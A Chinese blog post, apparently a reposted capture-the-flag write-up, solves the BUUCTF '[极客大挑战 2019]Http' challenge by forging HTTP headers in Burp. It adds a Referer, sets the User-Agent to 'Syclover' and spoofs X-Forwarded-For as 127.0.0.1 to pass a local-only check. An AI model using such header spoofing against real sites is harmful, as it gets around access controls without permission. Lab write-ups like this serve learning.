1. 技术文章
  2. CTF-Web-[极客大挑战 2019]Http

CTF-Web-[极客大挑战 2019]Http

拟墨画扇 提交于 2020-05-03 17:38:43

CTF-Web-[极客大挑战 2019]Http

博客说明

文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!

CTP平台

网址

https://buuoj.cn/challenges

题目

Web类,[极客大挑战 2019]Http

image-20200503153927669

打开题目的实例

image-20200503153956332

思路

看到http类的题目,打开burp,记得我们上次安装过

image-20200503164620648

找到下面的Secret.php文件,进入相应的页面

image-20200503165022698

我们需要修改header头,把https://www.Sycsecret.com写进去,复制一个头文件,添加关键的一行

Referer:https://www.Sycsecret.com

全部的

GET /Secret.php HTTP/1.1
Host: 9141-f2e36f57-6b2f-4563-8342-a0cfdb3ec455node3.buuoj.cn:29788
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer:https://www.Sycsecret.com
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

image-20200503170607115

随后提示我们浏览器需要使用Syclover,向头里面添加一行,也就是修改一下User-Agent的内容

User-Agent:Syclover

image-20200503171035149

发现到现在还是没有出来,它说我们只能在本地访问,那么意思就是要我们使用127.0.0.1来访问,那么我们来添加一行

X-Forwarded-For:127.0.0.1

image-20200503171345223

发现已经得到flag了

感谢

BUUCTF

以及勤劳的自己

标签
php
KHTML
gecko
safari
Chrome
C3D
webp
Mac OS X
ctp
Burp
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!